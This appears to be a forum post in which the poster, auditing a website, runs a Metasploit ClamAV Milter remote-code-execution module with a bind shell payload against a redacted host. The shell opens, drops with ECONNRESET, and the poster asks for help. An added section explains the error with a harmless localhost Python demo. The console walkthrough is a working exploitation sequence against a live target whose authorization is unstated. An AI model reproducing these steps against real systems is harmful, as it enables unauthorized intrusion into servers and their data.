I've been doing an audit of a website and, while looking at the open ports, I found that it had port 25 (SMTP) open. I searched for an exploit to try to exploit it in msf:
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
In the end I used an exploit that leverages a ClamAV Milter Blackhole-Mode Remote Code Execution vulnerability.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
- Started bind handler
- Command shell session 1 opened (192.168.229.130:59441 -> x.x.x.x:4444) at 2014-02-15 14:44:08 -0500
daemon
[Some strange encoding appears here] - x.x.x.x - Command shell session 1 closed. Reason: Died from Errno::ECONNRESET
I think I configured everything correctly, but I keep getting this error. I've tried different payloads and the same thing happens with all of them.
Can anyone help me?
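The "Died from Errno::ECONNRESET" message in the post is the handler reporting a TCP-level event: the peer tore the connection down with a RST segment instead of closing it gracefully with a FIN, which is what a handler sees when the process on the other end exits or is killed while the socket is still open. The following is an added example, not code from the original post or from Metasploit; it reproduces both ways a session can end on localhost so the two handler messages (a reset versus a plain EOF) can be told apart. The listener, its port and the `simulate` helper are all constructed for this demo.

```python
"""Reproduce the two ways a TCP session can die, so that a handler message such as
"Died from Errno::ECONNRESET" can be distinguished from a plain EOF.
Everything here runs on 127.0.0.1; no remote host is involved."""
import socket
import struct
import threading


def _peer_that_closes(listen_sock, abrupt):
    """Accept one connection and close it. abrupt=True closes with RST, not FIN."""
    conn, _ = listen_sock.accept()
    if abrupt:
        # SO_LINGER with a zero timeout discards the socket instead of shutting it
        # down gracefully, so the kernel sends RST. From the connecting side this is
        # what a remote process crashing or being killed mid-session looks like.
        conn.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
    conn.close()
    listen_sock.close()


def read_session_end(host, port):
    """Connect the way a bind handler would and classify how the peer ended the session."""
    with socket.create_connection((host, port), timeout=5) as s:
        try:
            data = s.recv(1024)
        except ConnectionResetError:
            return "reset"  # peer sent RST: errno ECONNRESET on this side
    # recv() returning no bytes means the peer sent FIN, i.e. a clean EOF
    return "eof" if data == b"" else "data"


def simulate(abrupt):
    """Start a throwaway listener (constructed for the demo) and report how the
    client saw the session end: "reset" for an abrupt close, "eof" for a graceful one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    t = threading.Thread(target=_peer_that_closes, args=(srv, abrupt))
    t.start()
    result = read_session_end("127.0.0.1", port)
    t.join()
    return result


if __name__ == "__main__":
    print("abrupt close  :", simulate(True))   # reset
    print("graceful close:", simulate(False))  # eof
```

When reviewing handler output, a reset immediately after "session opened" points at the far end going away (the process the session was attached to no longer exists), whereas an EOF means the peer shut the connection down deliberately; the distinction is useful both for troubleshooting a test and for an incident responder reading the same kind of log from the defending side.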